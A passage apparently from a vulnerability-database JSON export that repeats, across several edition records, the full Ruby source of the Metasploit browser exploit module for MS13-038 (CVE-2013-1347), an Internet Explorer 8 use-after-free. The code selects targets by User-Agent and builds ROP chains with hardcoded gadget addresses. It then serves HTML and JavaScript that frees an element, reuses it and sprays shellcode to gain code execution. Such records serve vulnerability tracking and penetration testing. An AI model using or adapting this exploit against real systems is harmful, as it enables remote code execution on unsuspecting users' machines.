:msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-08T20:11:42", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-20T14:57:39", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-20T14:57:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-20T14:57:39", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-20T16:55:16", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-20T16:55:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-20T16:55:16", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-25T16:58:04", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-25T16:58:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-25T16:58:04", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-25T20:58:06", "history": [], "viewCount": 66, "enchantments": 